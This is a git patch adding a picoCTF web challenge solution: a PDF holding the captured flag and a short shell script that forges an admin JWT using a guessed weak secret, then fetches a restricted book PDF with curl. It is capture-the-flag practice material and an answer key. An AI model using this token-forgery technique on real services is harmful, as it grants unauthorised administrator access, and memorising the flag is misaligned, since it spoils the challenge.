From 1ed2d8d2498bb60dd44e48157c20a058475dbb04 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Sat, 4 Jul 2026 22:04:13 +0900 Subject: [PATCH] web/java_code_analysis --- web/java_code_analysis/flag.pdf | 74 +++++++++++++++++++++++++++++++++ web/java_code_analysis/solve.sh | 22 ++++++++++ 2 files changed, 96 insertions(+) create mode 100644 web/java_code_analysis/flag.pdf create mode 100755 web/java_code_analysis/solve.sh diff --git a/web/java_code_analysis/flag.pdf b/web/java_code_analysis/flag.pdf new file mode 100644 index 0000000..5524dce --- /dev/null +++ b/web/java_code_analysis/flag.pdf @@ -0,0 +1,74 @@ +%PDF-1.1 +1 0 obj +<< +/CreationDate (D:20230804211609) +/Producer (text2pdf v1.1 (\251 Phil Smith, 1996)) +/Title (flag.txt) +>> +endobj +2 0 obj +<< +/Type /Catalog +/Pages 3 0 R +>> +endobj +4 0 obj +<< +/Type /Font +/Subtype /Type1 +/Name /F1 +/BaseFont /Courier +>> +endobj +5 0 obj +<< + /Font << /F1 4 0 R >> + /ProcSet [ /PDF /Text ] +>> +endobj +6 0 obj +<< +/Type /Page +/Parent 3 0 R +/Resources 5 0 R +/Contents 7 0 R +>> +endobj +7 0 obj +<< +/Length 8 0 R +>> +stream +BT +/F1 20 Tf +1 0 0 1 50 752 Tm +12 TL +(Great job! Here's your flag:)' +()' +()' +(picoCTF{w34k_jwt_n0t_g00d_7745dc02})' +ET +endstream +endobj +8 0 obj +119 +endobj +3 0 obj +<< +/Type /Pages +/Count 1 +/MediaBox [ 0 0 612 792 ] +/Kids [ 6 0 R ] +>> +endobj +xref +0 9 +0000000000 65535 f 0000000009 00000 n 0000000131 00000 n 0000000599 00000 n 0000000180 00000 n 0000000258 00000 n 0000000329 00000 n 0000000409 00000 n 0000000580 00000 n trailer +<< +/Size 9 +/Root 2 0 R +/Info 1 0 R +>> +startxref +684 +%%EOF diff --git a/web/java_code_analysis/solve.sh b/web/java_code_analysis/solve.sh new file mode 100755 index 0000000..6744240 --- /dev/null +++ b/web/java_code_analysis/solve.sh @@ -0,0 +1,22 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i bash -p jwt-cli + +URL="http://saturn.picoctf.net:54161" + +# NOTE: see: +# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/security/SecretGenerator.java +# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/security/ReauthenticationFilter.java +# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/controllers/BookController.java +# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/services/BookService.java + +TOKEN="$(jwt encode \ + --secret=1234 \ + --iss=bookshelf \ + --exp="1w" \ + '{"userId": 2, "email": "user", "role": "Admin"}' +)" + +curl "$URL/base/books/pdf/5" \ + -H "Authorization: Bearer $TOKEN" \ + --output flag.pdf +